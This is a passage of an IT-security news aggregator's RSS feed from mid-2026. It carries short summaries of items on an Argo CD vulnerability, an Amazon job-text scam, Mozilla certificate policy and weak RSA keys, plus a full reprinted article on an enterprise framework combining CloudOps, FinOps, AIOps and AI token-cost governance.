href="https://www.brighttalk.com/webcast/10457/662820?utm_source=blog&amp;utm_medium=website&amp;utm_content=blog-4-post-summit&amp;utm_campaign=global-mdr-2026-global-virtual-summit-prospect-eng" target="_blank"><span>Watch the full session</span></a><span> to explore how transparent AI supports better decisions in the SOC and how teams are applying it in practice.</span></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Caught in the Octopus Trap: Unauthenticated RCE in Argo CD with CodeQL]]></title>
<description><![CDATA[Synacktiv has discovered an unauthenticated arbitrary code execution vulnerability in ArgoCD's repo-server component, potentially allowing full cluster compromise. This article explains how the vulnerability was identified using CodeQL, details the exploitation process to gain control over the un...]]></description>
<link>https://tsecurity.de/de/3638841/it-security-nachrichten/caught-in-the-octopus-trap-unauthenticated-rce-in-argo-cd-with-codeql/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3638841/it-security-nachrichten/caught-in-the-octopus-trap-unauthenticated-rce-in-argo-cd-with-codeql/</guid>
<pubDate>Wed, 01 Jul 2026 16:37:56 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Synacktiv has discovered an unauthenticated arbitrary code execution vulnerability in ArgoCD's repo-server component, potentially allowing full cluster compromise. This article explains how the vulnerability was identified using CodeQL, details the exploitation process to gain control over the underlying Kubernetes cluster, and introduces a tool for automating the attack.]]></content:encoded>
</item>
<item>
<title><![CDATA[A framework for operational autonomy: Integrating CloudOps, FinOps and AIOps]]></title>
<description><![CDATA[Operational autonomy is quickly becoming one of the defining capabilities of a modern enterprise. As digital estates become more distributed, cloud environments more dynamic and AI consumption more expensive and less predictable, traditional operating models begin to show their limits. Teams can ...]]></description>
<link>https://tsecurity.de/de/3637916/it-security-nachrichten/a-framework-for-operational-autonomy-integrating-cloudops-finops-and-aiops/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3637916/it-security-nachrichten/a-framework-for-operational-autonomy-integrating-cloudops-finops-and-aiops/</guid>
<pubDate>Wed, 01 Jul 2026 11:06:18 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>Operational autonomy is quickly becoming one of the defining capabilities of a modern enterprise. As digital estates become more distributed, cloud environments more dynamic and AI consumption more expensive and less predictable, traditional operating models begin to show their limits. Teams can no longer rely only on manual oversight, disconnected monitoring tools or periodic financial reviews to keep enterprise technology healthy and cost efficient. What is needed instead is a coordinated operating framework that brings together CloudOps, FinOps and AIOps, while also addressing the emerging discipline of AI token and model consumption governance. When these disciplines are designed as one connected system rather than as isolated workstreams, organizations move closer to operational excellence: faster decisions, better resilience, improved financial control, stronger compliance and a more measurable connection between technology investments and business outcomes.</p>



<h2 class="wp-block-heading">What operational autonomy means in enterprise IT</h2>



<p>Operational autonomy does not mean removing people from operations. In practice, it means designing enterprise IT so that routine sensing, decision support, remediation, optimization and policy enforcement happen with minimal friction and with the right human oversight at the right moments. A mature autonomous operating model continuously observes infrastructure, applications, data flows, AI services and financial consumption patterns; detects risk or inefficiency early; and triggers guided or automated action based on policy, confidence and business criticality. This approach depends on four connected pillars: CloudOps to maintain reliable and scalable digital infrastructure, FinOps to govern cost and value, AIOps to detect patterns and automate response, and AI consumption governance to manage token usage, model selection, inference workloads and unit economics.</p>



<p>Gartner’s 2024 <a href="https://www.gartner.com/en/documents/5703151" rel="nofollow">research</a> on FinOps for data and analytics emphasizes that cloud operations and financial governance are no longer separate concerns, especially as AI workloads reshape cost structures and accountability expectations. Forrester’s 2024 <a href="https://www.forrester.com/report/the-state-of-aiops-and-observability/RES180470" rel="nofollow">analysis</a> of AIOps and observability similarly notes that modern enterprises need deeper operational visibility and broader insight-driven coordination to handle hybrid complexity. IDC’s 2024 <a href="https://www.marketresearch.com/IDC-v2477/Future-Operations-Framework-38402860/" rel="nofollow">perspective</a> on future operations adds another useful lens by framing data-driven operations around agility, resilience and predictability. Taken together, these viewpoints reinforce the same idea: autonomy is not a tool purchase; it is a management framework.</p>



<h2 class="wp-block-heading">Design principles for an enterprise operational autonomy framework</h2>



<p>A practical framework begins with a few disciplined principles. First, the enterprise must build around a shared operational data layer. Telemetry from cloud infrastructure, applications, service management systems, security controls, business transactions and AI services should be normalized so that operations, finance and governance teams work from the same facts. Second, every automated action should be policy-aware. Cost optimization, scaling, failover, remediation, model routing, data retention and access control should all reflect business guardrails rather than isolated technical rules.</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-large is-resized"> width="1024" height="688" sizes="auto, (max-width: 1024px) 100vw, 1024px"&gt;<figcaption class="wp-element-caption">Figure: The four pillars of autonomous IT.</figcaption></figure><p class="imageCredit">Magesh Kasthuri</p></div>



<p>Third, the framework should be value-led rather than purely cost-led. FinOps has matured beyond simply lowering spend; the stronger objective is to align spend with business priorities, performance requirements and acceptable risk. Fourth, autonomy should progress in stages. Enterprises usually start with visibility, then introduce recommendations, then guided automation and finally closed-loop autonomy for low-risk scenarios. Fifth, executive accountability must be explicit. Operational autonomy touches architecture, finance, privacy, security, data stewardship and business strategy. Without a cross-functional ownership model, autonomy becomes fragmented and difficult to govern. Everest Group’s 2024 FinOps Cloud Cost Management <a href="https://www.everestgrp.com/report/egr-2024-29-r-6601/" rel="nofollow">assessment</a> highlights the growing demand for role-based access, cost intelligence, governance and automation as core requirements for enterprise cloud cost management products. That is a useful signal that the framework must be built for collaboration, not just analytics.</p>



<h2 class="wp-block-heading">Integrating CloudOps, FinOps and AIOps into one operating model</h2>



<p>CloudOps, FinOps and AIOps are often discussed separately because each emerged from a different operational problem. CloudOps grew out of the need to run cloud estates reliably and at scale. FinOps developed in response to unpredictable consumption-based billing. AIOps emerged because traditional monitoring could not keep pace with the volume and complexity of telemetry generated across modern digital systems. Yet in a mature enterprise, these disciplines converge naturally.</p>



<p>A performance incident in a cloud platform is rarely only an availability problem; it may also drive higher infrastructure consumption, trigger excess logging charges, degrade customer experience or increase token usage in AI-enabled workflows. Similarly, a cost spike may not be a finance issue alone; it may reveal inefficient architecture, poor scheduling, unnecessary data movement or an AI agent behaving outside policy.</p>



<p>An integrated operating model therefore links observability signals, service context, business KPIs, financial metrics and automation rules into one decision fabric. CloudOps provides the runtime discipline, FinOps introduces value and accountability, and AIOps adds pattern recognition and intelligent response. When connected well, the enterprise can answer not only what is happening, but why it is happening, what it is costing, what risk it creates and what the best next action should be.</p>



<h2 class="wp-block-heading">AI token optimization and AI cost spend governance</h2>



<p>AI introduces a new cost curve into enterprise operations. Unlike traditional software costs, token spend can vary sharply based on prompt design, model choice, context length, retrieval patterns, orchestration logic, concurrency, caching strategy and user behavior. This makes AI cost governance an essential part of operational autonomy. A strong framework begins by defining the unit economics of AI consumption: cost per request, cost per conversation, cost per business workflow, cost per user segment and cost per outcome.</p>



<p>Once these baselines are visible, the enterprise can introduce optimization controls such as prompt compression, response-length policies, semantic caching, model tiering, workload routing to lower-cost models where quality tolerance allows, context-window discipline, batch processing for non-real-time use cases and approval thresholds for premium model usage. AI gateways and model brokers can enforce these policies consistently across teams.</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-large is-resized"> width="1024" height="709" sizes="auto, (max-width: 1024px) 100vw, 1024px"&gt;<figcaption class="wp-element-caption">Figure 2: AI FinOps framework</figcaption></figure><p class="imageCredit">Magesh Kasthuri</p></div>



<p>Chargeback or showback mechanisms should also extend to AI services so that business units see both value and consumption behavior. Recent <a href="https://www.forbes.com/councils/forbesfinancecouncil/2026/05/27/a-cfos-five-layer-framework-to-govern-ai-token-spend-before-it-governs-you/" rel="nofollow">analysis</a> in Forbes has drawn attention to the financial risks of unmanaged token growth and argues for governance layers that connect finance and engineering before AI expenditure becomes opaque. FinOps Foundation guidance on FinOps for AI reinforces the same message, noting that token-level metrics, quotas, tagging, GPU allocation practices and real-time monitoring are necessary to keep AI costs aligned to business value. In enterprise settings, the lesson is straightforward: if cloud cost needed FinOps, AI cost needs an even tighter form of FinOps because usage can scale much faster and become far less transparent as mentioned in IDC <a href="https://my.idc.com/getdoc.jsp?containerId=US53688325" rel="nofollow">report</a>.</p>



<h2 class="wp-block-heading">FinOps for cloud infrastructure cost management</h2>



<p>Cloud infrastructure cost management remains one of the foundational layers of operational autonomy because every autonomous workflow eventually rests on compute, storage, networking, platform services and data transfer. An effective FinOps capability does more than flag overspend after the month has ended. It creates near-real-time visibility into consumption, ownership, unit economics, forecast variance, commitments and waste patterns.</p>



<p>The enterprise should define standard practices for tagging, cost allocation, commitment management, rightsizing, idle resource detection, storage tiering, Kubernetes cost visibility, environment lifecycle controls and architecture reviews for high-cost services. More importantly, these practices should be tied to business context. For example, a workload serving a mission-critical customer channel may justify higher spend if it supports revenue protection, whereas a non-production environment should have stricter shutdown and spend caps.</p>



<p>Gartner’s 2024 <a href="https://www.gartner.com/en/documents/5703151" rel="nofollow">research</a> on FinOps for data and analytics underscores that AI and data workloads are changing the financial profile of cloud operations and increasing the need for more sophisticated tooling and governance. IDC’s market <a href="https://www.intel.com/content/dam/www/central-libraries/us/en/documents/2024-03/idc-ai-strategy-in-2024-growth-roi-security-brief.pdf" rel="nofollow">perspective</a> on intelligent cloud and edge operations with FinOps software also points to the rapid growth of platforms that combine operations intelligence with financial control, suggesting that enterprises increasingly view operational management and cost management as linked disciplines rather than separate layers.</p>



<h2 class="wp-block-heading">Autonomous operations through AIOps</h2>



<p>AIOps gives the framework its intelligence and response speed. In most enterprises, operations data is noisy, fragmented and too voluminous for humans to interpret quickly during incidents or performance degradation. AIOps platforms reduce that burden by correlating events, identifying anomalies, clustering symptoms, surfacing probable root causes and recommending or initiating remediation actions. The best outcomes appear when AIOps is connected not only to infrastructure monitoring but also to service maps, change records, configuration data, incident workflows and business priorities.</p>



<p>That connection allows the enterprise to distinguish between a harmless signal fluctuation and an issue that threatens a critical business service. Forrester’s 2024 <a href="https://www.forrester.com/report/the-state-of-aiops-and-observability/RES180470" rel="nofollow">research</a> on AIOps and observability explains this well by describing the complementary value of breadth and depth: observability provides richer technical insight, while AIOps helps transform those signals into operational action. In practice, autonomy grows when low-risk responses such as service restarts, resource adjustments, ticket enrichment, dependency checks or rollback decisions are automated under policy. High-risk actions should remain human-approved until confidence improves. Over time, the enterprise can move from reactive incident management to predictive operations, where emerging capacity risk, recurring error patterns or unusual AI workload behavior are addressed before service impact is visible to users.</p>



<h2 class="wp-block-heading">How the framework leads to operational excellence</h2>



<p>Operational excellence is the cumulative result of better decisions made earlier, faster and with clearer accountability. A well-designed autonomy framework improves service reliability because systems are observed continuously and remediation can be triggered before failures spread. It improves cost discipline because consumption anomalies are identified at the same time as performance or usage anomalies, not weeks later in a billing report.</p>



<p>It improves strategic focus because technology leaders can evaluate trade-offs in terms of business value rather than technical activity alone. It also improves employee productivity by removing repetitive operational effort and shifting skilled staff toward engineering improvements, policy tuning and service innovation. The most important outcome, however, is predictability. Enterprises become more confident in how they scale AI services, how they control cloud spend, how they handle operational events and how they meet compliance obligations. That confidence is what separates routine automation from genuine operational autonomy.</p>



<h2 class="wp-block-heading">Security, governance, process implementation and people upskilling</h2>



<p>No autonomy framework survives without strong security and governance. Automated operations amplify both efficiency and risk, which means identity controls, segmentation, least-privilege access, secrets management, encryption and auditability have to be embedded from the start. AI services add further concerns: prompt leakage, data residency, model misuse, training-data exposure, shadow AI adoption and uncontrolled access to external models.</p>



<p>Governance therefore needs to extend across cloud resources, operational workflows, AI services and data assets. Enterprises should establish clear policy domains covering infrastructure provisioning, AI model approval, token limits, vendor usage, observability data handling, retention rules, access reviews and exception management. Process implementation is equally important. The framework should define standard operating patterns for incident triage, automated remediation approval, cost anomaly review, model lifecycle management and post-incident learning. None of this works unless people are prepared for the shift.</p>



<p>Operations teams need skills in cloud economics, observability, automation engineering and policy-driven operations. Finance teams need to understand cloud and AI consumption models. Security and privacy teams need fluency in AI risk scenarios and control design. Business leaders need a clearer grasp of unit economics and value realization. IDC’s 2024 <a href="https://www.intel.com/content/dam/www/central-libraries/us/en/documents/2024-03/idc-ai-strategy-in-2024-growth-roi-security-brief.pdf" rel="nofollow">briefing</a> on enterprise AI strategy highlights the tension between rapid AI investment, ROI pressure, staffing constraints, security and compliance. That is exactly why upskilling must be treated as part of the framework itself, not as an optional change-management activity as per FinOps Foundation <a href="https://www.finops.org/wg/finops-for-ai-overview/" rel="nofollow">documentation</a>.</p>



<h2 class="wp-block-heading">The role of regulatory compliance</h2>



<p>Regulatory compliance is not a side topic in operational autonomy; it is one of the main reasons the framework must be formalized. Cloud environments frequently span jurisdictions, AI systems process sensitive information, observability platforms collect detailed operational data and automated decisions may influence customer experience or internal controls. Regulations such as GDPR, DPDP, sector-specific cybersecurity directives, financial reporting obligations, contractual data-handling requirements and internal audit standards all shape what autonomy can and cannot do.</p>



<p>Compliance requirements should therefore be translated into operational policy. Examples include residency-aware workload placement, data minimization in logs and prompts, access segregation for financial and regulated data, explainable automated actions, evidence retention, periodic control attestations and approval workflows for AI usage involving personal or confidential information. Chief privacy and data leaders play a central role here because the compliance question is no longer just where data is stored, but also how data is observed, transformed and consumed by AI-driven services. A mature framework reduces compliance risk by making control enforcement systematic rather than dependent on manual effort.</p>



<h2 class="wp-block-heading">How to implement the framework in practice</h2>



<p>Implementation is usually most successful when handled in phases. The first phase is baseline visibility: consolidate telemetry, cloud billing data, service inventory, AI usage data and business ownership into one operational picture. The second phase is governance design: define policies for tagging, spend thresholds, automation boundaries, access controls, model usage and compliance checkpoints.</p>



<p>The third phase is prioritization: choose a small number of use cases where autonomy can produce measurable value, such as cloud rightsizing, incident correlation, cost anomaly detection, AI token governance or automated remediation for recurring low-risk faults. The fourth phase is automation with guardrails: deploy workflows, approval rules and rollback paths. The fifth phase is optimization and learning: review outcomes, refine policies, update unit economics, expand autonomy coverage and measure business impact.</p>



<p>This staged approach matters because full autonomy is not achieved by switching on one platform. It is built progressively through trusted control, good data and disciplined execution.</p>



<h2 class="wp-block-heading">Useful tools for building the framework</h2>



<p>The tool landscape should be chosen based on architecture, governance maturity and operating model rather than vendor popularity alone. Cloud-native cost and operations tools from hyperscalers provide baseline visibility, but many enterprises supplement them with specialized FinOps platforms for allocation, forecasting, commitment analysis and chargeback. Observability platforms help unify metrics, logs, traces and service maps, while AIOps platforms add anomaly detection, event correlation and automation orchestration.</p>



<p>Service management platforms remain important for change control, incident workflows and audit evidence. AI gateways and model management layers are increasingly useful for token monitoring, policy enforcement, prompt controls, model routing and usage analytics. Security posture management, DSPM, identity governance and compliance automation tools also become part of the architecture because autonomy without trust quickly becomes fragile. The most effective toolchains are the ones that integrate technical telemetry, financial signals, governance policy and workflow automation into a coherent operating system for the enterprise.</p>



<h2 class="wp-block-heading">Executive roles in developing and managing the framework</h2>



<p>Here is a table that summarizes various Executive Roles and their responsibilities in Operational Autonomy governance.</p>



<figure class="wp-block-table"><div class="overflow-table-wrapper"><table class="has-fixed-layout"><tbody><tr><td><strong>Executive Role</strong></td><td><strong>Primary Responsibility in the Framework</strong></td><td><strong>Key Decisions and Governance Focus</strong></td></tr><tr><td>CIO</td><td>Owns the enterprise operating model and ensures CloudOps, FinOps and AIOps are aligned to business service outcomes.</td><td>Sets operating priorities, funds enabling platforms, establishes accountability, sponsors service reliability and cost transparency programs, and chairs cross-functional governance.</td></tr><tr><td>CTO</td><td>Defines the target architecture for autonomy, including cloud platforms, observability, automation, AI services and integration patterns.</td><td>Approves technical standards, automation design principles, platform engineering choices, model architecture strategy and engineering guardrails for scale and resilience.</td></tr><tr><td>Chief Privacy Officer</td><td>Ensures that data use in observability, automation and AI operations complies with privacy law and internal policy.</td><td>Defines controls for personal data handling, retention, consent boundaries, cross-border transfer considerations, prompt and log privacy, and privacy impact assessments.</td></tr><tr><td>Chief Data Officer</td><td>Leads data governance, data quality, metadata management and trustworthy access to the shared operational data layer.</td><td>Defines data classification, stewardship, lineage expectations, AI data usage standards and interoperability rules required for accurate autonomous decision-making.</td></tr><tr><td>Chief Strategy Officer</td><td>Connects the autonomy framework to enterprise transformation goals, investment priorities and measurable business value.</td><td>Shapes business case design, prioritizes value pools, aligns the framework with growth and efficiency strategy, and ensures operating metrics support executive decision-making.</td></tr></tbody></table> </div></figure>



<h2 class="wp-block-heading">Conclusion</h2>



<p>Developing operational autonomy for an enterprise is not about chasing a futuristic ideal. It is about building a disciplined and connected operating model that helps the organization run technology with greater confidence, speed and accountability. CloudOps keeps the estate reliable, FinOps ensures that spending reflects value, AIOps makes complexity manageable and AI cost governance brings much-needed control to token-driven consumption. Security, privacy, compliance, process rigor and people capability are what make the framework sustainable. When all of these parts work together, the enterprise does not just automate tasks; it strengthens resilience, improves financial stewardship and creates a more adaptive path to operational excellence.</p>



<p><em>This article was made possible by our partnership with the IASA </em><a href="https://chiefarchitectforum.org/" target="_blank" rel="nofollow"><em>Chief Architect Forum</em></a><em>. The CAF’s purpose is to test, challenge and support the art and science of Business Technology Architecture and its evolution over time as well as grow the influence and leadership of chief architects both inside and outside the profession. The CAF is a leadership community of the </em><a href="https://iasaglobal.org/" target="_blank" rel="nofollow"><em>IASA</em></a><em>, the leading non-profit professional association for business technology architects.</em></p>



<p><strong>This article is published as part of the Foundry Expert Contributor Network.</strong><br><strong><a href="https://www.cio.com/expert-contributor-network/">Want to join?</a></strong></p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Watch out for &#8220;high paying, low effort&#8221; Amazon job texts]]></title>
<description><![CDATA[Scammers are using Amazon and the promise of big money to lure people in to their trap.]]></description>
<link>https://tsecurity.de/de/3636909/it-security-nachrichten/watch-out-for-8220high-paying-low-effort8221-amazon-job-texts/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3636909/it-security-nachrichten/watch-out-for-8220high-paying-low-effort8221-amazon-job-texts/</guid>
<pubDate>Tue, 30 Jun 2026 23:22:19 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Scammers are using Amazon and the promise of big money to lure people in to their trap.]]></content:encoded>
</item>
<item>
<title><![CDATA[Watch out for “high paying, low effort” Amazon job texts]]></title>
<description><![CDATA[Scammers are using Amazon and the promise of big money to lure people in to their trap. This article has been indexed from Malwarebytes Read the original article: Watch out for “high paying, low effort” Amazon job texts
Read more →
The post Watch out for “high paying, low effort” Amazon job texts...]]></description>
<link>https://tsecurity.de/de/3636907/it-security-nachrichten/watch-out-for-high-paying-low-effort-amazon-job-texts/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3636907/it-security-nachrichten/watch-out-for-high-paying-low-effort-amazon-job-texts/</guid>
<pubDate>Tue, 30 Jun 2026 23:22:17 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Scammers are using Amazon and the promise of big money to lure people in to their trap. This article has been indexed from Malwarebytes Read the original article: Watch out for “high paying, low effort” Amazon job texts</p>
<p class="more-link-p"><a class="more-link" href="https://www.itsecuritynews.info/watch-out-for-high-paying-low-effort-amazon-job-texts/">Read more →</a></p>
<p>The post <a href="https://www.itsecuritynews.info/watch-out-for-high-paying-low-effort-amazon-job-texts/">Watch out for “high paying, low effort” Amazon job texts</a> appeared first on <a href="https://www.itsecuritynews.info/">IT Security News</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Mozilla tightens rules for certificate authorities to improve web security]]></title>
<description><![CDATA[Mozilla has released version 3.1 of its Mozilla Root Store Policy (MRSP), introducing new requirements aimed at improving transparency and oversight across the public Web PKI. The updated policy, which takes effect on July 1, 2026, focuses on stronger Certification Authority (CA) documentation an...]]></description>
<link>https://tsecurity.de/de/3635684/it-security-nachrichten/mozilla-tightens-rules-for-certificate-authorities-to-improve-web-security/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3635684/it-security-nachrichten/mozilla-tightens-rules-for-certificate-authorities-to-improve-web-security/</guid>
<pubDate>Tue, 30 Jun 2026 15:09:23 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Mozilla has released version 3.1 of its Mozilla Root Store Policy (MRSP), introducing new requirements aimed at improving transparency and oversight across the public Web PKI. The updated policy, which takes effect on July 1, 2026, focuses on stronger Certification Authority (CA) documentation and enhanced audit reporting. While previous Root Store Policy revisions focused on …</p>
<p>The post <a href="https://cyberinsider.com/mozilla-tightens-rules-for-certificate-authorities-to-improve-web-security/">Mozilla tightens rules for certificate authorities to improve web security</a> appeared first on <a href="https://cyberinsider.com/">CyberInsider</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[UPCOMING WEBINAR – AI Is The Hot Sauce: From Data Overload To Investigative Insight]]></title>
<description><![CDATA[Join Cellebrite’s July 7 webinar to learn how responsible AI can help investigators connect evidence, uncover insights faster, and maintain the transparency and defensibility every case demands—register now.]]></description>
<link>https://tsecurity.de/de/3635603/it-security-nachrichten/upcoming-webinar-ai-is-the-hot-sauce-from-data-overload-to-investigative-insight/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3635603/it-security-nachrichten/upcoming-webinar-ai-is-the-hot-sauce-from-data-overload-to-investigative-insight/</guid>
<pubDate>Tue, 30 Jun 2026 14:38:13 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Join Cellebrite’s July 7 webinar to learn how responsible AI can help investigators connect evidence, uncover insights faster, and maintain the transparency and defensibility every case demands—register now.]]></content:encoded>
</item>
<item>
<title><![CDATA[UK ponders copying more EU App Store rules]]></title>
<description><![CDATA[The UK's Competition and Markets Authority is considering forcing Apple and Google to open their App Stores and allow rival payment systems, exactly like the European Union.UK Parliament - image credit: ParliamentIn February 2026, the UK's Competition and Markets Authority (CMA) got agreements fr...]]></description>
<link>https://tsecurity.de/de/3635452/ios-mac-os/uk-ponders-copying-more-eu-app-store-rules/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3635452/ios-mac-os/uk-ponders-copying-more-eu-app-store-rules/</guid>
<pubDate>Tue, 30 Jun 2026 13:38:20 +0200</pubDate>
<category>🍏 iOS / Mac OS</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[The UK's Competition and Markets Authority is considering forcing Apple and Google to open their <a href="https://appleinsider.com/inside/app-store" title="App Store" data-kpt="1">App Stores</a> and allow rival payment systems, exactly like the European Union.<br><br><div><img src="https://photos5.appleinsider.com/gallery/54139-109079-48836-95405-000-lead-UK-xl-xl.jpg" alt="UK Parliament" height="720"><br><span>UK Parliament - image credit: Parliament</span></div><br>In February 2026, the UK's Competition and Markets Authority (CMA) got agreements from Apple and Google over changes to their app stores. It was an <a href="https://appleinsider.com/articles/26/02/10/uk-gets-apple-and-google-to-agree-to-easy-app-store-changes">easy win</a> for the UK, since it just meant the two firms agreeing to issues over transparency that they already did in the EU.<br><br>According to <em>Reuters</em>, however, the CMA is <a href="https://www.reuters.com/world/uk-regulator-proposes-easing-apple-google-app-store-payment-rules-2026-06-30/">now proposing</a> that the UK adopts much more of the EU's positions. In a post-Brexit UK, politicians will never say they're emulating the European Union, but that is exactly what is being considered.<br><br><br> <a href="https://appleinsider.com/articles/26/06/30/uk-ponders-copying-more-eu-app-store-rules?utm_source=rss">Continue Reading on AppleInsider</a> | <a href="https://forums.appleinsider.com/discussion/244826?urm_source=rss">Discuss on our Forums</a>]]></content:encoded>
</item>
<item>
<title><![CDATA[AI Agents Could Get Verified Identities, Courtesy of DNS]]></title>
<description><![CDATA[The open standard would tie every agent's identity to certificates and a public transparency log nobody can edit.]]></description>
<link>https://tsecurity.de/de/3635122/unix-server/ai-agents-could-get-verified-identities-courtesy-of-dns/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3635122/unix-server/ai-agents-could-get-verified-identities-courtesy-of-dns/</guid>
<pubDate>Tue, 30 Jun 2026 12:00:52 +0200</pubDate>
<category>🐧 Unix Server</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[The open standard would tie every agent's identity to certificates and a public transparency log nobody can edit.]]></content:encoded>
</item>
<item>
<title><![CDATA[SB Mini II: Apple-II-Klon zum Nachbauen]]></title>
<description><![CDATA[Simon Boak hat ein Faible für alte Elektronikgeräte und Computer. In seinem Blog Unimplemented Trap dokumentiert der Entwickler und Bastler seine Projekte in diesem Bereich. Neben Mini-Konsolen, Rechenmaschinen und ähnlichen Geräten hat Boak auch die Elektronik von alten Apple-Rechnern nachgebaut...]]></description>
<link>https://tsecurity.de/de/3634983/ios-mac-os/sb-mini-ii-apple-ii-klon-zum-nachbauen/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3634983/ios-mac-os/sb-mini-ii-apple-ii-klon-zum-nachbauen/</guid>
<pubDate>Tue, 30 Jun 2026 10:53:15 +0200</pubDate>
<category>🍏 iOS / Mac OS</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<a href="https://www.ifun.de/sb-mini-ii-apple-ii-klon-zum-nachbauen-282726/"><img align="right" hspace="5" width="150" height="150" src="https://images.ifun.de/wp-content/uploads/2026/06/lcd-monitor-fuer-apple-ii-150x150.jpg" class="alignright tfe wp-post-image" alt="Lcd Monitor Fuer Apple Ii" decoding="async"></a><p>Simon Boak hat ein Faible für alte Elektronikgeräte und Computer. In seinem Blog Unimplemented Trap dokumentiert der Entwickler und Bastler seine Projekte in diesem Bereich. Neben Mini-Konsolen, Rechenmaschinen und ähnlichen Geräten hat Boak auch die Elektronik von alten Apple-Rechnern nachgebaut. Sein jüngstes Projekt ist der SB Mini II, ein funktionsfähiger Nachbau des Apple II. Apple […]</p>
<p>The post <a href="https://www.ifun.de/sb-mini-ii-apple-ii-klon-zum-nachbauen-282726/">SB Mini II: Apple-II-Klon zum Nachbauen</a> first appeared on <a href="https://www.ifun.de/">ifun.de</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Layoffs looming, Xbox union members argue for transparency and good-faith bargaining]]></title>
<description><![CDATA[Xbox union members argue for transparency and good-faith bargaining.]]></description>
<link>https://tsecurity.de/de/3633866/it-nachrichten/layoffs-looming-xbox-union-members-argue-for-transparency-and-good-faith-bargaining/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3633866/it-nachrichten/layoffs-looming-xbox-union-members-argue-for-transparency-and-good-faith-bargaining/</guid>
<pubDate>Mon, 29 Jun 2026 21:17:20 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Xbox union members argue for transparency and good-faith bargaining.]]></content:encoded>
</item>
<item>
<title><![CDATA[macOS Golden Gate Beta 3 – Everything You Need to Know!]]></title>
<description><![CDATA[macOS Golden Gate Beta 27.0 Beta 3 (25G5052e) is now Available! UPDATED: 06/29/26 Apple has released the third developer beta of macOS Golden Gate with more refinements to the new interface and AI features. Beta 3 further improves the Liquid Glass design with better readability, updated window st...]]></description>
<link>https://tsecurity.de/de/3633787/ios-mac-os/macos-golden-gate-beta-3-everything-you-need-to-know/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3633787/ios-mac-os/macos-golden-gate-beta-3-everything-you-need-to-know/</guid>
<pubDate>Mon, 29 Jun 2026 20:24:31 +0200</pubDate>
<category>🍏 iOS / Mac OS</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>macOS Golden Gate Beta 27.0 Beta 3 (25G5052e) is now Available! UPDATED: 06/29/26 Apple has released the third developer beta of macOS Golden Gate with more refinements to the new interface and AI features. Beta 3 further improves the Liquid Glass design with better readability, updated window styling, and a new transparency slider that lets … <a href="https://mrmacintosh.com/macos-golden-gate-beta-3-everything-you-need-to-know/" class="more-link">Continue reading<span class="screen-reader-text"> "macOS Golden Gate Beta 3 – Everything You Need to Know!"</span></a></p>
<p>The post <a href="https://mrmacintosh.com/macos-golden-gate-beta-3-everything-you-need-to-know/">macOS Golden Gate Beta 3 – Everything You Need to Know!</a> appeared first on <a href="https://mrmacintosh.com/">Mr. Macintosh</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Factoring RSA Keys with Many Zeros]]></title>
<description><![CDATA[Interesting research on a new class of weak RSA keys: keys with lots of zeros. It turns out that these keys are out in the wild.
The badkeys project is an open-source service that checks public keys for known vulnerabilities. While developing this tool, Hanno collected a massive number of real-wo...]]></description>
<link>https://tsecurity.de/de/3633506/it-security-nachrichten/factoring-rsa-keys-with-many-zeros/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3633506/it-security-nachrichten/factoring-rsa-keys-with-many-zeros/</guid>
<pubDate>Mon, 29 Jun 2026 18:24:28 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Interesting research on a <a href="https://blog.trailofbits.com/2026/06/12/factoring-short-sleeve-rsa-keys-with-polynomials/">new class</a> of weak RSA keys: keys with lots of zeros. It turns out that these keys are out in the wild.</p>
<blockquote><p>The badkeys project is an open-source service that checks public keys for known vulnerabilities. While developing this tool, Hanno collected a massive number of real-world keys from public sources, including Certificate Transparency logs, internet-wide TLS and SSH scans, PGP keys, and many others. By searching this dataset for unexpectedly sparse RSA moduli, we uncovered a large number of keys in the wild with the patterns in Figure 1...</p></blockquote>]]></content:encoded>
</item>
<item>
<title><![CDATA[Italian watchdog probes Microsoft as M365 price change looms]]></title>
